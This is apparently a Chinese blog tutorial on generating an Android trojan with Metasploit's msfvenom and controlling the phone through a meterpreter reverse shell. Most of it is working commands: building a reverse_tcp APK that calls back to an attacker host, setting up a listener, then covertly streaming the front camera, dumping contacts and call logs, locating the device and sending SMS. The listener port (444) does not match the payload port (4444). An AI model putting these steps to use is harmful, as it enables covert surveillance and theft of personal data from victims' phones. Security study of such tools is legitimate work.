msf之手机木马生成&利用

msf自带的有对应各个平台生成木马的工具msfvenom,而且不需要进入msf,直接在命令行输入命令即可

木马生成命令

msfvenom -p payload LHOST=本地地址 LPORT=本地端口 -f 文件类型 -o 木马文件
如:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.60.44 LPORT=4444 -f exe -o payload.exe

本次以一个安卓手机木马为例,简单介绍msf的木马生成功能

环境准备

肉鸡 : 一加3T手机 安卓8.0 已获取root

攻击机 : kali

木马生成

msfvenom --platform android -p android/meterpreter_reverse_tcp LHOST=192.168.1.16 LPORT=4444 R> /root/demo.apk

image-20201226214558606

设置监听

use exploit/multi/handler
set lhost 192.168.1.16
set lport 444

image-20201226224516835

上传木马到手机 并打开

image-20201226223826315

使用监听

run

image-20201226221902725

查看命令

help

image-20201226221949299

打开手机前置摄像头

webcam_stream -i 2

image-20201226224651540

前提是手机亮屏 , 第一次手机会有摄像头打开的提示 , 默认锁屏一会消失画面

image-20201226222223345

获取手机联系人

dump_contacts    #获取联系人列表
image-20201226223947495

针对手机的其他命令:

image-20201226224342933

Geolocate #定位
wlan_geolocate #wifi 定位
dump_calllog #获取通话记录
send_sms #发送短信

# 发送短信: 
meterpreter > send_sms -d 152xxxx1475 -t hello word
[+] SMS sent - Transmission successful
原文地址:https://www.cnblogs.com/xcymn/p/14464972.html